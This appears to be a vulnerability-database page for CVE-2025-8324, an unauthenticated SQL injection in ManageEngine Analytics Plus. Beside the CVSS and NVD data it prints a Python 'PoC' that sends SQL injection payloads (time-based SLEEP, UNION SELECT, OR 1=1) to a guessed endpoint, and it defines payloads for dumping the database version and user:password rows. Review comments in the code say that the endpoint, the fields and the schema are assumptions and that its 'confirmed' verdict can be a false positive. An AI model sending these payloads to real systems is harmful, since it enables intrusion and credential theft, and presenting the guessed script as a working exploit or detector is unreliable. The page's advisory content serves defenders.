Security Vulnerability Report
CVE-2025-8324 CVSS 9.8 CRITICAL

CVE-2025-8324

Published: 2025-11-11 13:15:45
Last Modified: 2026-04-15 00:35:42
Source: 0fc0942c-577d-436f-ae8e-945763c79b02

Description

Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to the improper filter configuration.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ManageEngine Analytics Plus <= 6170

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8324 Unauthenticated SQL Injection PoC
# Target: ManageEngine Analytics Plus <= 6170
# Type: SQL Injection via improper filter configuration
#
# NOTE(review): the advisory text published with this script names no
# endpoint, parameter or database schema. The request path, the form field
# names and the table/column names below are the script author's assumptions
# (the inline comments say "typically" and "adjust based on enumeration"),
# and the payload strings are generic. The advisory scopes the issue by build
# number (6170 and below), so comparing the installed build against the vendor
# advisory is the exposure check this page actually supports.
import requests
import sys


def exploit_sql_injection(target_url: str) -> bool:
    """Send four fixed payload strings to one URL and report a coarse verdict.

    Each payload is sent as the ``filter_name`` field of a form-encoded POST
    to ``{target_url}/api/filter`` together with ``report_id=1``.

    Returns True as soon as one request either times out or comes back with
    HTTP 200 and a body that passes the keyword test below; returns False if
    no request does. Neither condition distinguishes an injectable parameter
    from an ordinary page or a slow host, so True is not evidence of
    CVE-2025-8324 and False is not evidence of a patched system.
    """
    # Target endpoint - typically in reporting/filter functionality
    # NOTE(review): assumed path, not taken from the advisory.
    endpoint = f"{target_url}/api/filter"

    # SQL Injection payload - testing with time-based blind injection
    # Adjust payload based on actual vulnerable parameter
    payloads = [
        "' OR SLEEP(5)-- -",
        "' OR 1=1 UNION SELECT NULL-- -",
        "' AND (SELECT * FROM (SELECT SLEEP(5))a)-- -",
        "admin' OR '1'='1' -- -"
    ]

    # Fixed browser-like User-Agent and a form-encoded body: for log review,
    # the recognisable part of this traffic is the SQL syntax in the POST body,
    # not the headers.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*'
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Testing {len(payloads)} SQL injection payloads...")

    for i, payload in enumerate(payloads, 1):
        print(f"\n[*] Testing payload {i}/{len(payloads)}")
        print(f"[*] Payload: {payload}")

        # Vulnerable parameter - adjust based on enumeration
        # NOTE(review): field names are assumed, see header note.
        data = {
            'filter_name': payload,
            'report_id': '1'
        }

        try:
            # verify=False turns off TLS certificate validation, so the
            # response is not tied to the host named in target_url.
            response = requests.post(
                endpoint,
                data=data,
                headers=headers,
                timeout=10,
                verify=False
            )

            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")

            # Check for successful injection indicators
            # This test is true for any 200 response whose body lacks the word
            # "error" (or contains "success"), which includes login pages and
            # generic landing pages. It does not compare against a baseline.
            if response.status_code == 200:
                if 'error' not in response.text.lower() or 'success' in response.text.lower():
                    print(f"[!] Potential vulnerability detected!")
                    # Returns on the first match, so later payloads are never sent.
                    return True

        except requests.exceptions.Timeout:
            # Any request slower than the 10 s timeout lands here, whatever
            # the cause (network filtering, overloaded host); elapsed time is
            # never measured against a request without a delay payload.
            print(f"[!] Request timed out - potential blind SQL injection!")
            return True
        except Exception as e:
            # Connection and protocol errors are printed and the loop moves on.
            print(f"[-] Error: {str(e)}")

    # NOTE(review): placement after the loop is reconstructed from a listing
    # whose line breaks were lost; confirm against the original file.
    return False


def extract_database_info(target_url: str) -> None:
    """Placeholder: defines three payload strings and prints one message.

    Nothing is sent to ``target_url``; the three variables are assigned and
    never used. The table name ``users`` and the columns ``user_name`` and
    ``password`` are assumptions; nothing on this page establishes the
    product's schema or database engine.
    """
    # Database version extraction payload
    db_version_payload = "' UNION SELECT @@version-- -"
    # Database name extraction payload
    db_name_payload = "' UNION SELECT database()-- -"
    # Users table extraction payload
    users_payload = "' UNION SELECT GROUP_CONCAT(user_name,':',password) FROM users-- -"

    print("\n[*] Extracting database information...")
    # Implementation would send these payloads and parse responses


if __name__ == "__main__":
    # Command-line entry: one positional argument, the base URL.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-8324.py <target_url>")
        print("Example: python cve-2025-8324.py https://analytics.example.com")
        sys.exit(1)

    target = sys.argv[1]

    # The "confirmed" wording overstates what the probe can show: it prints on
    # any True result, including the false positives described in
    # exploit_sql_injection. The extraction call is commented out, so no
    # further requests are made on either branch.
    if exploit_sql_injection(target):
        print("\n[!] Vulnerability confirmed! Proceeding with data extraction...")
        # extract_database_info(target)
    else:
        print("\n[-] No vulnerability detected or target not affected")

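References

https://www.manageengine.com/analytics-plus/CVE-2025-8324.html (vendor advisory, as listed in the raw JSON data below)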

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8324", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-11-11T13:15:45.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to the improper filter configuration."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.manageengine.com/analytics-plus/CVE-2025-8324.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02"}]}}